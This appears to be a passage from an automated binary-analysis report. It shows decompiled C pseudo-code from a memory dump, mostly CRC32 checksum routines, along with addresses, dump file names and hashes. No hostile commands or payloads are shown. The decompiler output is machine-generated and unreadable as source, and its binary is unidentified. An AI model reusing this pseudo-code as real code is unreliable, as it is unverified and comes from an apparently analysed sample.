^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x414dd0 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t229 >> 0x18) * 4) ^  *(0x414dd0 + (_t229 & 0x000000ff) * 4) ^ _t242[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t163 >> 0x18) * 4) ^  *(0x414dd0 + (_t163 & 0x000000ff) * 4) ^  *_t164;
							_t146 =  &(_t164[1]);
							_t95 =  *(0x4145d0 + (_t234 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (_t234 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t234 >> 0x18) * 4) ^  *(0x414dd0 + (_t234 & 0x000000ff) * 4);
							_t246 = _t246 - 1;
						} while (_t246 != 0);
					}
					if(_t236 >= 4) {
						_t241 = _t236 >> 2;
						do {
							_t98 = _t95 ^  *_t146;
							_t236 = _t236 - 4;
							_t146 = _t146 + 4;
							_t95 =  *(0x4145d0 + (_t98 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (_t98 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t98 >> 0x18) * 4) ^  *(0x414dd0 + (_t98 & 0x000000ff) * 4);
							_t241 = _t241 - 1;
						} while (_t241 != 0);
					}
					if(_t236 != 0) {
						do {
							_t165 =  *_t146 & 0x000000ff;
							_t146 = _t146 + 1;
							_t95 = _t95 >> 0x00000008 ^  *(0x4141d0 + ((_t165 ^ _t95) & 0x000000ff) * 4);
							_t236 = _t236 - 1;
						} while (_t236 != 0);
					}
					return  !_t95;
				} else {
					return _t93;
				}
			}

















                                        0x00410970
                                        0x00410976
                                        0x00410979
                                        0x00410e55
                                        0x00410e59
                                        0x00410e5c
                                        0x00410e62
                                        0x00410e64
                                        0x00410e69
                                        0x00410e6c
                                        0x00410e78
                                        0x00410e7f
                                        0x00410e80
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00410e80
                                        0x00410e64
                                        0x00410e82
                                        0x00410e86
                                        0x00410e8f
                                        0x00410e92
                                        0x00410ece
                                        0x00410ed6
                                        0x00410eda
                                        0x00410fc8
                                        0x00410fee
                                        0x00411007
                                        0x0041100a
                                        0x0041100f
                                        0x00411043
                                        0x0041104c
                                        0x0041104e
                                        0x00411083
                                        0x0041108a
                                        0x0041108a
                                        0x00411091
                                        0x00411095
                                        0x00411099
                                        0x004110a0
                                        0x004110a0
                                        0x004110a2
                                        0x004110ac
                                        0x004110e2
                                        0x004110e4
                                        0x004110e4
                                        0x004110a0
                                        0x004110ea
                                        0x004110f0
                                        0x004110f0
                                        0x004110f3
                                        0x00411101
                                        0x00411108
                                        0x00411108
                                        0x004110f0
                                        0x0041110f
                                        0x00410978
                                        0x00410978
                                        0x00410978

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 226c0784b6316ba66f76e893f340fa6999d635edc621c34ae34e7579f7862257
                                        • Instruction ID: d2dfc1ac500a9a647efe650cc4865594c05007eabd9f07892ef3b971e930880b
                                        • Opcode Fuzzy Hash: 226c0784b6316ba66f76e893f340fa6999d635edc621c34ae34e7579f7862257
                                        • Instruction Fuzzy Hash: 6A71E2F16205824BDB14CF29FCD06773392EBD9384F4AC939DB0287296C638B971C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410C90, Relevance: .1, Instructions: 143COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00410C90(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				char _v128;
				char _v256;
				signed int _t52;
				unsigned int _t53;
				unsigned int _t54;
				unsigned int _t55;
				unsigned int _t62;
				signed int* _t66;
				signed int* _t67;
				signed int _t70;
				signed int _t73;
				signed int* _t74;
				signed int* _t75;
				signed int* _t76;
				signed int* _t77;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				signed int _t97;

				_t96 =  &_v256;
				_t94 = _a12;
				_t86 = _a16;
				_t97 = _t86;
				if(_t97 > 0 || _t97 >= 0 && _t94 != 0) {
					_t73 = 1;
					_v256 = 0xedb88320;
					_t52 = 1;
					do {
						 *(_t96 + 8 + _t52 * 4) = _t73;
						_t52 = _t52 + 1;
						_t73 = _t73 + _t73;
					} while (_t52 < 0x20);
					_t89 = 0;
					do {
						_t53 =  *(_t96 + _t89 + 0x10);
						_t74 =  &_v256;
						_t82 = 0;
						if(_t53 != 0) {
							do {
								if((_t53 & 0x00000001) != 0) {
									_t82 = _t82 ^  *_t74;
								}
								_t74 =  &(_t74[1]);
								_t53 = _t53 >> 1;
							} while (_t53 != 0);
						}
						 *(_t96 + _t89 + 0x90) = _t82;
						_t89 = _t89 + 4;
					} while (_t89 < 0x80);
					_t90 = 0;
					do {
						_t54 =  *(_t96 + _t90 + 0x90);
						_t75 =  &_v128;
						_t83 = 0;
						if(_t54 != 0) {
							do {
								if((_t54 & 0x00000001) != 0) {
									_t83 = _t83 ^  *_t75;
								}
								_t75 =  &(_t75[1]);
								_t54 = _t54 >> 1;
							} while (_t54 != 0);
						}
						 *(_t96 + _t90 + 0x10) = _t83;
